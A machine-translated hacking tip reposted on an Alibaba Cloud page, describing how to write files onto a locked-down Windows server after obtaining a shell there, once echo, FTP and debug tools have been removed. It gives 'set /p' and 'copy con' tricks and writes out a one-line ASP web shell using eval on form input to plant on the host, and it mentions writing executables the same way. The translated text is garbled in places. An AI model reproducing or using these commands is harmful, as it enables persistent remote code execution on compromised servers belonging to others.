Assume that I use BT (allyesno)

Source: Internet
Author: User
Use security policies to prohibit local hosts from connecting to any port of the other party!
Then allow others to connect to their own port 80!
Remove debug/FTP/TFTP/ITS/start/NET/net1/ECHO/edit! Only Web services are provided locally!
Close/filter all ports. Now we get a shell for this host. Is there a way to mount the file?

Why is Echo removed from the kernel?

Don't worry, we still have set.

Set/P allyesno = del C:/.> allyesno. bat

If an escape character is encountered, it is ^...

Set/P allyesno = ^ <SCRIPT runat ^ = server language ^ = JavaScript ^> eval ^ (request. form ^ ('^ #' ^) + ''^) ^ </script ^> allyesno. ASP

If the other party is a BT
More> allyesno. asp
Copy con allyesno. asp

Press Ctrl + Z at the end and press F6.

You can enter anyCode(Including carriage return) if the suffix is com
You can also write executable files (without debugging, you can think about it yourself)

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.